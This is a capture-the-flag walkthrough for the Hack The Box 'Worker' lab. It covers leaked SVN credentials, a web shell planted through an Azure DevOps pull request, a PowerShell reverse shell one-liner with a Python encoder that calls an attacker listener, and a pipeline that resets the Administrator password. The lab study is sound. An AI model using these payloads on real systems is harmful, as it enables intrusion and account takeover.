# Hack The Box - Worker Walkthrough without Metasploit

![Worker](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSEq0Jh6yvOGZeqKMRp%2F-MSEqvuRryC08ZvG1cwz%2Fimage.png?alt=media\&token=043cd83c-7333-4921-8c37-a7b06fa9b135)

## Enumeration

Run nmap against our target 10.10.10.203 with the following flags:

-sC   Script scan, equivalent to --script=default

-sV   Service version info

-p-   Scan all ports

```
nmap -sC -sV -p- 10.10.10.203
```

![Worker Enumeration](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSEq0Jh6yvOGZeqKMRp%2F-MSEuNsEmByLwxmugPzD%2Fimage.png?alt=media\&token=54e09ab5-a540-40ab-835c-e3e8be0f28c9)

### Http

We discover a web page on port 80 which doesn't seem to have much at first glance:

![Page on port 80](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSEq0Jh6yvOGZeqKMRp%2F-MSEvBo5HkD7PNEygJMW%2Fimage.png?alt=media\&token=d3fdc98e-aa26-48ef-861d-58792e0c9258)

But as always, when we encounter a web page, we run gobuster against it:

```
gobuster dir -u 10.10.10.203 -w /usr/share/wordlists/dirb/common.txt -t 40 -e
```

![Gobuster Scan](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSEq0Jh6yvOGZeqKMRp%2F-MSF0kXyIBwSxm1gb58t%2Fimage.png?alt=media\&token=f9427645-219f-4bf1-b6b8-5422258c0d99)

We didn't get much from this port. We also ran gobuster with bigger wordlists and with *-x* to append common Windows extensions (**asp**, **aspx**) plus **jsp**, **html**, **php**, **db**, **txt** and **xml**, with no luck either.

### Svn

There's a Subversion server (svnserve) running on port 3690.

**Subversion** is a VCS (Version Control System). It's "like" **Git**, with some differences:

Centralized instead of distributed: there is one repository on the server and each checkout is a working copy of it.

You must be connected to the server to commit.

The full history lives on the server; a working copy does not carry it the way a Git clone does.

Branching and merging are heavier operations than in Git.

That is part of why Git has largely displaced it, even though Subversion (2000) came out about five years before Git (2005). The point that matters to us here is the flip side of central history: every revision ever committed is kept on the server, so anything that was once checked in, credentials included, is still retrievable even if it was removed later. In case someone wants to know a bit more about it:

{% embed url="<https://subversion.apache.org/>" %}

#### Checkout

We are going to checkout whatever repository we have there:

```
svn checkout svn://10.10.10.203
```

![SVN checkout](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSEq0Jh6yvOGZeqKMRp%2F-MSF27krB7ebvQZoe0eP%2Fimage.png?alt=media\&token=f92608fd-fb1e-462b-91e0-d739e37d9931)

The most interesting file here is moved.txt:

![moved.txt](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSEq0Jh6yvOGZeqKMRp%2F-MSF2NEmvgdmyGkSuo2i%2Fimage.png?alt=media\&token=a9e2c663-b7d0-43af-9f18-2a509e90c080)

We found a new Host to add to our /etc/hosts:

```
sudo nano /etc/hosts
```

![/etc/hosts](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSEq0Jh6yvOGZeqKMRp%2F-MSF2rE5YKqeRVcccW5L%2Fimage.png?alt=media\&token=ab855d7d-9915-4352-8978-75404522ce7a)

Now we can try to access that url:

![devops.worker.htb](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSEq0Jh6yvOGZeqKMRp%2F-MSF398BtR1psxgCq22p%2Fimage.png?alt=media\&token=e71a76eb-f851-458f-8283-1a4dab2c7eb1)

#### Gathering info from SVN

So, we need some credentials to access here... Let's dig a bit more on that svn repository we just downloaded in order to see if we can find something useful:

```
svn info
```

![SVN Info](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSEq0Jh6yvOGZeqKMRp%2F-MSF3kUi__3-3ajxjPvd%2Fimage.png?alt=media\&token=bd8d011f-c25b-4ac9-8b02-503bd3d4438a)

We got the revision number, which is **5**, and the name of a user, **nathen**.

#### SVN diff

The revision number is actually really important: the server keeps every earlier revision, so we can compare our working copy (revision 5) with each of the previous four and see what changed, including anything that was deleted along the way:

```
svn diff -r <Revision Number>
```

With a single revision number, `-r N` diffs revision N against the working copy, so `-r 4` shows what changed between revision 4 and 5.

![Revision 5 vs Revision 4](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSEq0Jh6yvOGZeqKMRp%2F-MSF5sc8BNsLPcUCFlYB%2Fimage.png?alt=media\&token=5d8e8492-2d4b-43e9-adf6-b58682e924b6)

The only change is the moved.txt that we saw before; let's try a different revision:

![Revision 5 vs Revision 3](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSEq0Jh6yvOGZeqKMRp%2F-MSF6KzFCZau7Sp8gL48%2Fimage.png?alt=media\&token=f6cb7601-c5d8-4f5c-af89-abbd3f75dd60)

We can confirm the user **nathen** and... was there a password in plain text!? We have to take a look at revision 2:

![Revision 5 vs Revision 2](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSEq0Jh6yvOGZeqKMRp%2F-MSF6rVrNFRfBXoIOkxN%2Fimage.png?alt=media\&token=5805f3dc-82e6-4877-94a3-1bf36c43db60)
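The manual walk above (log, then diff each revision against the previous one, then read the added lines) is easy to automate. The script below is an added example, not part of the original write-up or of any tool it uses: it parses `svn log --xml`, diffs every revision with `svn diff -c`, and flags added lines that look like credentials. It assumes the `svn` client is installed; the regexes are ours, and the embedded sample log and diff are constructed (the file name `deploy.ps1` and the commit messages are hypothetical, only the user name and password come from the write-up).

```python
#!/usr/bin/env python3
"""Walk every revision of a Subversion repository and grep the diffs for secrets.

Added example, not the write-up's own code. Requires the `svn` client for the
live mode; the offline demo runs on the constructed sample below.
"""
import re
import subprocess
import sys
import xml.etree.ElementTree as ET

# Patterns that commonly mark a hard-coded credential (assumption: tune per target).
SECRET_PATTERNS = [
    # key = value / key: value, e.g. $password = "wendel98"
    re.compile(r"(?i)(password|passwd|pwd|secret|token|api[_-]?key)\s*[=:]\s*['\"]?([^\s'\";]+)"),
    # user:pass@host embedded in a URL
    re.compile(r"://([^\s:/@]+):([^\s@]+)@"),
]

# Constructed sample of `svn log --xml` output (not captured from the box).
SAMPLE_LOG = """<?xml version="1.0"?>
<log>
<logentry revision="3"><author>nathen</author><date>2020-06-20T14:35:32.000000Z</date><msg>remove password</msg></logentry>
<logentry revision="2"><author>nathen</author><date>2020-06-20T14:31:10.000000Z</date><msg>add deploy script</msg></logentry>
<logentry revision="1"><author>nathen</author><date>2020-06-20T14:30:00.000000Z</date><msg>initial import</msg></logentry>
</log>
"""

# Constructed sample of `svn diff -c 2` output (file name is hypothetical).
SAMPLE_DIFF = """Index: deploy.ps1
===================================================================
--- deploy.ps1\t(revision 1)
+++ deploy.ps1\t(revision 2)
@@ -0,0 +1,3 @@
+$user = "nathen"
+$password = "wendel98"
+Invoke-WebRequest -Uri "http://nathen:wendel98@devops.worker.htb/" -UseBasicParsing
"""


def parse_log(xml_text: str):
    """Turn `svn log --xml` output into a sorted list of (revision, author, message)."""
    root = ET.fromstring(xml_text)
    entries = []
    for entry in root.findall("logentry"):
        rev = int(entry.get("revision"))
        author = entry.findtext("author", default="")
        msg = entry.findtext("msg", default="")
        entries.append((rev, author, msg.strip()))
    return sorted(entries)


def find_secrets(diff_text: str):
    """Return (key, value) pairs from the added lines of a unified diff that look like secrets."""
    hits = []
    for line in diff_text.splitlines():
        # Only lines the revision added; skip the '+++ file' header.
        if not line.startswith("+") or line.startswith("+++"):
            continue
        for pat in SECRET_PATTERNS:
            for m in pat.finditer(line):
                hits.append((m.group(1), m.group(2)))
    return hits


def svn(args):
    """Run an svn subcommand non-interactively and return its stdout."""
    proc = subprocess.run(["svn", "--non-interactive", *args],
                          check=True, capture_output=True, text=True)
    return proc.stdout


def scan_repository(url: str):
    """Diff each revision against its predecessor and report secrets per revision."""
    report = {}
    for rev, author, msg in parse_log(svn(["log", "--xml", url])):
        diff = svn(["diff", "-c", str(rev), url])   # -c N == -r N-1:N
        hits = find_secrets(diff)
        if hits:
            report[rev] = (author, msg, hits)
    return report


if __name__ == "__main__":
    if len(sys.argv) > 1:   # e.g. python3 svn_secrets.py svn://10.10.10.203
        for rev, (author, msg, hits) in scan_repository(sys.argv[1]).items():
            print(f"r{rev} ({author}) {msg!r}: {hits}")
    else:                   # offline demo on the constructed sample
        print(find_secrets(SAMPLE_DIFF))
```

Because it diffs per revision rather than against the head, a secret that was added in revision 2 and removed in revision 3 still shows up, which is exactly the case on this box.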

#### Repository

Now we have a user, **nathen**, and a password, **wendel98**. If we try them on <http://devops.worker.htb> we get in:

![Svn Repository](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSEq0Jh6yvOGZeqKMRp%2F-MSF83rG2c2mQRRtVvOe%2Fimage.png?alt=media\&token=9d67ed42-0462-4ab9-bd64-55f729ba2103)

Clicking on SmartHotel360 will take us to the following page:

![Repos](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSEq0Jh6yvOGZeqKMRp%2F-MSF8WVuZixngxmKumZL%2Fimage.png?alt=media\&token=8f8bff40-3c7e-4265-bb31-362683161061)

Here we can see the Repositories:

![Master](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSEq0Jh6yvOGZeqKMRp%2F-MSF8qqD8xyL6-tyt-fX%2Fimage.png?alt=media\&token=c8e890f4-ccee-463b-b4ae-edfa3e5a2ea7)

## Exploitation

We are going to use the Azure DevOps repository (not the SVN one) to gain access to the box. To do so we must get a change onto master and have it deployed: a page that lets us execute commands on the machine. Since the server is IIS 10.0, that page has to be **asp** or **aspx**.

### Foothold

We tried to commit directly on master, but a branch policy blocks that, so we are going to create a new branch, make our change there and then open a pull request.

On Repos go to Branches, New Branch, give your branch a name and Create branch:

![Branch Creation](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSEq0Jh6yvOGZeqKMRp%2F-MSF9vlU_xt1hWbXaZoF%2Fimage.png?alt=media\&token=06b7d41b-28d5-4263-8494-e9184a0eeb9b)

Click on our new created branch:

![evilbranch](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSHIDa3b7XQ-fPj3W4U%2F-MSHLkE18BPCkqONy_z4%2Fimage.png?alt=media\&token=4aeeeb32-2de4-4d17-a3f3-0448b60b3542)

Now upload a cmdasp.aspx web shell (Kali ships one at '/usr/share/webshells/aspx/cmdasp.aspx').

Click on Upload File(s), browse... and then select our cmdasp.aspx:

![Uploading cmdasp.aspx](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSHIDa3b7XQ-fPj3W4U%2F-MSHQt5Ti95w_EeWutth%2Fimage.png?alt=media\&token=d2ceafe5-3cd6-401c-bd1f-342357b0a0fd)

The branch policy also requires a work item to be linked to the commit:

![Work items linked](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSHIDa3b7XQ-fPj3W4U%2F-MSHYE5g3SwLxcxYZJsI%2Fimage.png?alt=media\&token=f5233a2b-d1f4-46d6-95b0-b73f07c31c98)

Now we just click on commit and we'll be able to see the new commit id, and the aspx file on the branch successfully uploaded.

![Committed changes](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSHIDa3b7XQ-fPj3W4U%2F-MSHRUKA-jETyO21jWRC%2Fimage.png?alt=media\&token=7bbb771f-4872-41c4-bcff-4483c9b9a213)

Next we click on Create a pull request (the link is shown next to the commit id in the previous picture).

Create a new pull request from our evilbranch into master, selecting Nathalie (our own user) as reviewer:

![Pull request](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSHIDa3b7XQ-fPj3W4U%2F-MSHVl78yLY_pCmxweAH%2Fimage.png?alt=media\&token=f7b64ba7-5c72-4a4d-95a8-2e2c7f4295d4)

If we take too long over this process, a cleanup job on the box removes our branch before we finish:

![branch deleted](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSHIDa3b7XQ-fPj3W4U%2F-MSHWDhn8vlAmEMssDuP%2Fimage.png?alt=media\&token=cf5deb3a-410a-4124-b537-b0966b6ad11c)

To avoid it we have to prepare everything beforehand and go through the steps as fast as possible. We now have to repeat the process, using a different branch name as well.

Once we are back at this point, we approve the pull request as its reviewer:

![Approve commit](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSHIDa3b7XQ-fPj3W4U%2F-MSHYg0SasUanhXJDWZp%2Fimage.png?alt=media\&token=a9120432-3b44-48a0-86ba-0711b0eba396)

And Set auto-complete:

![Set Auto-Complete](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSHIDa3b7XQ-fPj3W4U%2F-MSHYxUOt2DL1GjOVBn8%2Fimage.png?alt=media\&token=539ba9e0-4596-4477-9a30-efb28e787842)

![Set auto-complete accept](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSHIDa3b7XQ-fPj3W4U%2F-MSHZ1tys3oP1ybvtW1S%2Fimage.png?alt=media\&token=2d6cb9c7-986a-44d8-8be2-18c9b1ad260c)

Once the policies are satisfied it will automatically complete the pull request:

![Pull Request Completed](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSHIDa3b7XQ-fPj3W4U%2F-MSHZAnc3f3W7kkf7mUH%2Fimage.png?alt=media\&token=96bdfb35-2e81-48bf-84e0-842614d497d4)

If we go to the master branch now, we should be able to see our cmd page there:

![cmd aspx included](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSHIDa3b7XQ-fPj3W4U%2F-MSH_ArENArB7CVBoxgR%2Fimage.png?alt=media\&token=aa5ab817-f357-4bc2-92a6-063293281ace)

If we look closely, next to master there is a hostname with the subdomain **spectral**, i.e. spectral.worker.htb, which is where this repository gets deployed. To reach our new page we need to add that name to our /etc/hosts as well:

![new subdomain](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSHIDa3b7XQ-fPj3W4U%2F-MSH_eIKE9rv-fPGtid6%2Fimage.png?alt=media\&token=7c914b98-cb78-45d7-973d-72c95c75da84)

Now if we try to access our new feature:

![Error accessing cmdasp](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSHIDa3b7XQ-fPj3W4U%2F-MSHaHfgB1GVVPoT62t2%2Fimage.png?alt=media\&token=609e337e-8b78-47c8-9c71-f7c0829cbdbb)

The file is gone again: the box cleans up frequently, so we really have to move fast to get access to this machine. We are therefore going to prepare every step in advance: the cmdasp.aspx and the command we will run through it, which will be an encoded PowerShell reverse shell.

The reverse shell is the usual one-liner: it connects back to our listener, reads a command, runs it with iex and sends the output back followed by a fake `PS >` prompt. Replace IP and PORT with our own listener:

```powershell
$client = New-Object System.Net.Sockets.TCPClient('IP',PORT);$stream = $client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1|Out-String);$sendback2=$sendback + 'PS '+(pwd).Path+'> ';$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush();}$client.Close();
```

We encode it with PSEncoder.py:

{% embed url="<https://github.com/4st1nus/PSEncoder>" %}

```
python3 PSEncoder.py /path/to/our/reverse.ps1
```

![PSEncoder.py](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSHq0ZYTk-g6xaxLFpz%2F-MSHwEc6bo2F6LNZMgV-%2Fimage.png?alt=media\&token=4cbb1785-5f09-4e61-b29c-657a2a4a5b38)

Now, in the command box of the web shell, we run PowerShell with the encoded script and the following arguments (PowerShell accepts unambiguous prefixes of its parameter names, case-insensitively):

-Exec ByPass   short for -ExecutionPolicy Bypass, so the script policy does not stop us

-Nol   short for -NoLogo, no banner in the output

-Enc   short for -EncodedCommand, the script as base64 of its UTF-16LE encoding

```
PowerShell.exe -Exec ByPass -Nol -Enc <Encoded Payload>
```

Have a netcat listening on the port indicated and click on execute:

![Entering our Reverse shell encoded](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSHIDa3b7XQ-fPj3W4U%2F-MSHhMTjdOvDJIPwDVJv%2Fimage.png?alt=media\&token=16bd01cc-2af7-4e41-9b2d-4428edb7064f)

![Listening on our Kali](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSHIDa3b7XQ-fPj3W4U%2F-MSHhRrYDgkJGIgobkN_%2Fimage.png?alt=media\&token=f01727b7-1b99-4517-be19-0f2efa35536e)
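`-EncodedCommand` only requires the script to be UTF-16LE encoded and then base64'd, so we do not strictly need PSEncoder. The following is an added example (not the write-up's tool): it fills our listener address into the reverse-shell template, produces the exact command line to paste into cmdasp.aspx, and can decode a blob back, which is also handy on the blue-team side when an `-Enc` argument shows up in process-creation logs. The listener IP and port used in the usage line are assumptions.

```python
#!/usr/bin/env python3
"""Build the `powershell -EncodedCommand` line for the reverse shell without PSEncoder.

Added example, not the write-up's tool. -EncodedCommand expects base64 of the
script encoded as UTF-16LE; that is all this reproduces.
"""
import base64

# The reverse-shell one-liner from the write-up, with placeholders for our listener.
# Doubled braces are literal braces (str.format is used to fill lhost/lport).
REVERSE_SHELL = (
    "$client = New-Object System.Net.Sockets.TCPClient('{lhost}',{lport});"
    "$stream = $client.GetStream();"
    "[byte[]]$bytes = 0..65535|%{{0}};"
    "while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){{"
    "$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);"
    "$sendback = (iex $data 2>&1 | Out-String);"
    "$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';"
    "$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);"
    "$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};"
    "$client.Close()"
)


def encode_ps(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE bytes, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_ps(blob: str) -> str:
    """Inverse of encode_ps; use it to see what an -Enc blob found in logs really runs."""
    return base64.b64decode(blob).decode("utf-16-le")


def build_command(lhost: str, lport: int) -> str:
    """Return the full line to paste into the cmdasp.aspx command box."""
    script = REVERSE_SHELL.format(lhost=lhost, lport=lport)
    # Same flags as the write-up, written out in full.
    return ("powershell.exe -ExecutionPolicy Bypass -NoLogo -EncodedCommand "
            + encode_ps(script))


if __name__ == "__main__":
    # Assumed listener: our Kali box on 10.10.14.2, nc -lvnp 4444
    cmd = build_command("10.10.14.2", 4444)
    print(cmd)
    # Sanity check: decoding the blob must give back the filled-in script.
    assert decode_ps(cmd.split()[-1]) == REVERSE_SHELL.format(lhost="10.10.14.2", lport=4444)
```

Keep the listener running before you submit the command: the web shell's request hangs for as long as the reverse shell lives, so there is no second chance to read its output.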

## Internal Enumeration

First let's take a look at the user we are after:

![User robisl](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSHhTPCb4WaPfGGZ9WD%2F-MSHj4m5qeC0Mny8kvpP%2Fimage.png?alt=media\&token=336fc6a2-85bf-4e67-bc11-c73c21b46e83)

We can see there is more than one volume on this box:

![Volume W](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSHhTPCb4WaPfGGZ9WD%2F-MSHje-yzjPsOOaHv9Ra%2Fimage.png?alt=media\&token=fa58470e-0d5a-48c3-8bdb-b1e42fbc471f)

If we go into that volume and take a look around, we will find a passwd file under **svnrepos/www/conf**. That is svnserve's user database, which stores passwords in clear text, and it holds a password for robisl:

![robisl password](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSHhTPCb4WaPfGGZ9WD%2F-MSHk5zBubr9xsGBiUMt%2Fimage.png?alt=media\&token=a66c399b-975d-4954-94f6-12d662a0659f)

### Impersonating the user

Let's use the tool evil-winrm to enter as robisl with that password:

{% embed url="<https://github.com/Hackplayers/evil-winrm>" %}

```
evil-winrm -i <ip> -u <user> -p <password>
```

![Evil-Winrm as user](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSHhTPCb4WaPfGGZ9WD%2F-MSHknvWn1ChR5VnViiT%2Fimage.png?alt=media\&token=36ddb812-c7c8-4787-9955-a5d890d1d2ca)

We are in as robisl and can grab the user flag. Now let's escalate privileges; to do that we are going to try the same password on the DevOps repository as robisl.

### Privilege Escalation

Log in to devops.worker.htb as robisl:

![Repository as Robin](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSHlKAih5-N3GwOJzN9%2F-MSHlfUMfN4sJmeyxbjj%2Fimage.png?alt=media\&token=90b784e0-f3e7-44f5-a23c-a6e12183466d)

In order to escalate privileges we are going to exploit the Pipelines feature:

![New Pipeline](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSHlKAih5-N3GwOJzN9%2F-MSHmBnz7L7PJOUPxQjO%2Fimage.png?alt=media\&token=5242c5cd-a150-45ab-b1a4-835847f4e1ce)

Since the repository is an Azure Repos Git repository, select that as the source:

![Azure Repos Git](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSHlKAih5-N3GwOJzN9%2F-MSHmZC-iATFBGYjnKUu%2Fimage.png?alt=media\&token=6570fe92-3f54-489d-9ab8-fe08f5801367)

Select our Repository:

![Repository](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSHlKAih5-N3GwOJzN9%2F-MSHmhTfdz0pofQV3Koi%2Fimage.png?alt=media\&token=17205852-4e5d-4f17-84a6-c1eb45f4b19d)

Create a Starter pipeline:

![Starter Pipeline](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSHlKAih5-N3GwOJzN9%2F-MSHn8wJw6pnDkFVEA2w%2Fimage.png?alt=media\&token=d84903ae-4b54-4a90-b4e0-e71401a082ea)

The important thing here to modify is the script part:

![Default pipeline](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSHlKAih5-N3GwOJzN9%2F-MSHnUqtVL4HT1HFD5vV%2Fimage.png?alt=media\&token=6d9c2679-f8a1-473b-bbf9-e6e8dabd5787)

We get rid of everything not needed and make the script step run `net user` to set a new Administrator password. The pipeline runs on the self-hosted build agent, which lives on this very box with enough privilege for that command to succeed:

![Modified Pipeline](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSHlKAih5-N3GwOJzN9%2F-MSHpF_FJ-JF8ZFHmblY%2Fimage.png?alt=media\&token=e143d058-3a31-4665-95d3-8abb02490ad9)

Save and run:

![Run Pipeline](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSHlKAih5-N3GwOJzN9%2F-MSHpNQ3NWPnLaxXj5Pv%2Fimage.png?alt=media\&token=650cc100-9600-4fb1-8bf9-2507f8bbdfba)

We wait a bit while it runs, and we should have this:

![Pipeline executed](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSHlKAih5-N3GwOJzN9%2F-MSHpai5ULVZS3xp2ERV%2Fimage.png?alt=media\&token=b8b60028-d5d4-480a-b212-af421e7944d9)
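The pipeline definition itself is only shown in the screenshots above, so here is a reconstruction as an added example (not the page's own YAML, and it should be treated as a template). The agent pool name `Setup` and the new password are assumptions; `whoami` is included so the job log tells you which account the agent actually runs as before you rely on it.

```yaml
# azure-pipelines.yml (added example; pool name and password are assumptions)
trigger: none          # run only when we queue it by hand, never on push

pool:
  name: Setup          # self-hosted agent pool that runs on the target itself

steps:
- script: |
    whoami
    net user Administrator Adm1nR3set2021
  displayName: 'Reset the local Administrator password via the build agent'
```

The `script` step is executed by cmd.exe on a Windows agent, so avoid quoting the password (cmd would keep the quotes as part of it) and avoid characters like `%` that cmd interprets. Resetting the Administrator password is loud and destructive; it is fine on a lab box, but on a real engagement you would rather add a separate account or just read a file from the agent's context as proof.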

Let's try evil-winrm again with our new creds.

## Pwnd

![Administrator](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSHlKAih5-N3GwOJzN9%2F-MSHpr7nkDVTWMApyNjq%2Fimage.png?alt=media\&token=1ec6a048-67ab-4a25-9ef4-ccf96564bf98)

We can grab the root flag ;)
